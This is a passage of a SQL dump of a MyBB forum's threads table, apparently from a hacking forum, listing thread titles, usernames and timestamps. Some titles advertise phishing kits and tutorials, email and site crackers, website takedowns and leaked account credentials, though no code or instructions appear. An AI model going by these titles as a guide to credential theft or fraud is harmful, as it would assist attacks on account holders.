`visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('325', '7', 'Total users online', '0', '0', '0', '67', 'HoverCatz', '1346710974', '1515', '1346716145', 't3h jok3r', '1', '13', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('326', '16', '[TUT] Free Restaurant Gift Cards.', '0', '0', '0', '166', '2112', '1346716335', '1520', '1347434323', '??????Z', '112', '26', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('328', '48', 'Mod Notice in threads', '0', '0', '0', '1', 't3h jok3r', '1346718764', '1533', '1350330679', 'VirtualLegend', '228', '18', '4', '', '1', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('329', '46', 'New phi$hing theme service', '0', '0', '0', '17', 'khade009', '1346725132', '1536', '1346789028', 'khade009', '17', '13', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('336', '7', 'Hope my work pays off', '0', '0', '0', '82', 'iTzIpod', '1346802503', '1586', '1346875327', 'iTzIpod', '82', '25', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('330', '7', 'Request Exchange', '0', '0', '0', '53', 'sirchamp', '1346767124', '1544', '1346796380', 't3h jok3r', '1', '14', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('331', '5', 'New Rules and Instructions v.5', '0', '0', '0', '1', 't3h jok3r', '1346767410', '1545', '1350330002', 't3h jok3r', '1', '32', '10', '', '1', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('332', '4', 'Hello', '0', '0', '0', '172', 'MistaCode', '1346774569', '1549', '1347181707', 'MistaCode', '172', '34', '9', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('333', '42', 'Six Degrees Made For Adult Students', '0', '0', '0', '7', 'Romdu62', '1346796544', '1565', '1347328849', 'Timmy', '5', '11', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('334', '54', '[Brazzers/Mofos/Hustler/Naughtyamerica...// Sept-05-12]', '0', '0', '0', '1', 't3h jok3r', '1346797616', '1570', '1346797616', 't3h jok3r', '1', '7', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('335', '25', 'ESET NOD32 Antivirus & ESET Smart Security Username And Password 4 sept 2012', '0', '0', '0', '5', 'Timmy', '1346798084', '1575', '1346972326', 'NXK', '61', '7', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('337', '15', '[HOT] Syslogger LATEST VERSION [HOT]', '0', '2', '0', '171', 'W33D', '1346806276', '1587', '1347649070', '??zg???g????61', '100', '14', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('338', '4', 'Hola', '0', '0', '0', '112', '??????Z', '1346815667', '1597', '1346968042', '??????Z', '112', '29', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('339', '55', '[Req]Torrentleech invite', '0', '0', '0', '62', 'R?????zo?', '1346837105', '1601', '1346837105', 'R?????zo?', '62', '8', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('340', '16', 'Free Nike\'s SE', '0', '0', '0', '112', '??????Z', '1346841602', '1604', '1346963257', '??????Z', '112', '18', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('341', '54', 'Porn passes (big list)', '0', '0', '0', '62', 'R?????zo?', '1346878986', '1614', '1349387962', '??zg???g????61', '100', '30', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('342', '3', '[Announcement] Domain Change', '0', '0', '0', '82', 'iTzIpod', '1346885024', '1617', '1346885024', 'iTzIpod', '82', '6', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('344', '3', 'Quick Updates and Notices V.2', '0', '0', '0', '1', 't3h jok3r', '1346900949', '1623', '1346971591', 'unixmoon', '13', '31', '5', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('345', '63', 'Need userbar! [Gamers]', '0', '0', '1', '61', 'NXK', '1346962407', '1632', '1348461403', 'Triple H', '4', '192', '31', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('346', '19', '[Junk]Heads Up', '0', '0', '0', '82', 'iTzIpod', '1346964654', '1642', '1349127769', 'iTzIpod', '82', '10', '3', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('347', '19', '[Junk]Warning', '0', '0', '0', '178', 'The Host', '1346966395', '1643', '1346966469', 't3h jok3r', '1', '9', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('348', '30', 'Brazzers Cracker', '0', '0', '0', '1', 't3h jok3r', '1346970335', '1647', '1347332768', 'Apathy', '2', '17', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('349', '33', 'Everyone Read', '0', '0', '0', '82', 'iTzIpod', '1346970400', '1648', '1346973648', 'iTzIpod', '82', '15', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('350', '18', 'WESTi\'s Email Cracker (Crack Any E-Mail - Hotmail, Yahoo, Gmail)', '0', '0', '0', '1', 't3h jok3r', '1346970708', '1649', '1347329098', 'Timmy', '5', '15', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('351', '46', 'Phishing Tutorial', '0', '0', '0', '8', 'spacefish36', '1346971069', '1651', '1349049375', 'spacefish36', '8', '23', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('352', '12', 'How to Take Down Websites Effectively + Proof', '0', '0', '0', '8', 'spacefish36', '1346971302', '1652', '1347237507', 'spacefish36', '8', '35', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('353', '13', '[Complete Guide]*How to crack All Sites Hosting With Apex!*[Complete Guide]', '0', '0', '0', '13', 'unixmoon', '1346971496', '1654', '1347677746', 'p420', '9', '9', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('354', '23', '[MBAM] Self-Help Removal Tutorials', '0', '0', '0', '13', 'unixmoon', '1346971723', '1656', '1347237614', 'spacefish36', '8', '2', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('355', '25', '[TUT]Remove Win32:Sality virus and any other AV-blocking viruses', '0', '0', '0', '9', 'p420', '1346971856', '1658', '1346971856', 'p420', '9', '1', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('356', '16', 'Haribo - SE', '0', '0', '0', '112', '??????Z', '1346978831', '1669', '1346978831', '??????Z', '112', '14', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('357', '3', '[Bug] Can\'t Rep?', '0', '0', '0', '82', 'iTzIpod', '1346979495', '1670', '1347069720', 't3h jok3r', '1', '18', '4', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('359', '29', 'Easiest Hacking Technique EVER!', '0', '0', '0', '1', 't3h jok3r', '1347079022', '1691', '1347079022', 't3h jok3r', '1', '13', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('358', '3', 'Misconfigure, Unable & Cloudflare downtime', '0', '0', '0', '1', 't3h jok3r', '1347068867', '1677', '1347137522', 'JakeUS', '20', '30', '3', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('360', '58', 'What are the official groups?', '0', '0', '0', '5', 'Timmy', '1347080163', '1694', '1347414149', 'iTzIpod', '82', '19', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('361', '54', 'Xbox live Code (1 Month)', '0', '0', '0', '172', 'MistaCode', '1347120296', '1702', '1347459005', 'NXK', '61', '30', '4', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('362', '7', 'List of TOP 10 HACKERS', '0', '0', '0', '1', 't3h jok3r', '1347132958', '1705', '1347237432', 'spacefish36', '8', '13', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('363', '8', 'Top 10 songs of September 2012', '0', '0', '0', '1', 't3h jok3r', '1347133364', '1706', '1347910227', 'iTzIpod', '82', '23', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('364', '12', 'How to hack accounts Hotmail/yahoo/Runescape/Minecraft/Porn [Guide By NXK]', '0', '0', '0', '61', 'NXK', '1347137768', '1708', '1347137768', 'NXK', '61', '0', '0', '', '0', '0', '0', '', '-2', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('365', '3', 'HAHA SHIT CAN WORK!!!!', '0', '0', '0', '1', 't3h jok3r', '1347170217', '1709', '1347170217', 't3h jok3r', '1', '19', '0', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('366', '2', 'Testing SMTP Emailer', '0', '0', '0', '1', 't3h jok3r', '1347172849', '1710', '1347172953', 'Timmy', '5', '10', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('367', '3', 'Please Read!', '0', '0', '0', '1', 't3h jok3r', '1347173438', '1713', '1347205769', 'iTzIpod', '82', '13', '2', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('368', '47', '5 free @l33thacking.net forwarders', '0', '0', '0', '1', 't3h jok3r', '1347174018', '1714', '1347681035', 'Timmy', '5', '62', '9', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('369', '55', 'Paypal 1 dollar 50cents', '0', '0', '0', '53', 'sirchamp', '1347182055', '1720', '1347481482', 'iTzIpod', '82', '28', '3', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('370', '35', 'Basic L33THACKING logo (just an basic one)', '0', '0', '0', '172', 'MistaCode', '1347182680', '1721', '1347800288', 'iTzIpod', '82', '29', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('371', '7', 'How do I make an ICQ account?', '0', '0', '0', '20', 'JakeUS', '1347197111', '1723', '1347197111', 'JakeUS', '20', '5', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('372', '3', 'Reputation', '0', '0', '0', '53', 'sirchamp', '1347206027', '1728', '1347234358', 't3h jok3r', '1', '14', '2', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('373', '16', 'Cadburys (SE)', '0', '0', '0', '112', '??????Z', '1347209691', '1734', '1347328971', 'Timmy', '5', '8', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('374', '19', '[Junk]PLEASE DELETE', '0', '0', '0', '62', 'R?????zo?', '1347212594', '1735', '1347249273', 't3h jok3r', '1', '7', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('375', '30', 'Yahoo-ACC-Maker V.1.4', '0', '0', '0', '62', 'R?????zo?', '1347212649', '1736', '1347212649', 'R?????zo?', '62', '7', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('376', '54', 'ExpressVPN codes', '0', '0', '0', '62', 'R?????zo?', '1347212894', '1738', '1349452950', 'R?????zo?', '62', '12', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('377', '54', 'Netflix accounts', '0', '0', '0', '62', 'R?????zo?', '1347212944', '1739', '1347332586', 'iTzIpod', '82', '14', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('383', '29', 'Paypal Withdrawy to cash or debit card [TUT DL]', '0', '0', '0', '112', '??????Z', '1347258711', '1765', '1347748728', 'Timmy', '5', '32', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('378', '7', 'How is school for you?', '0', '0', '0', '82', 'iTzIpod', '1347220183', '1742', '1347711866', 'iTzIpod', '82', '68', '20', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('379', '34', 'Itachi\'s Intermediate Signature Tutorial', '0', '0', '0', '82', 'iTzIpod', '1347226893', '1743', '1347226893', 'iTzIpod', '82', '4', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('386', '24', 'Rar Password Unlocker v2.1', '0', '0', '0', '5', 'Timmy', '1347328500', '1772', '1347328500', 'Timmy', '5', '4', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('380', '34', 'Simple Signature Tutorial', '0', '0', '0', '82', 'iTzIpod', '1347230245', '1746', '1348457568', 'iTzIpod', '82', '10', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, 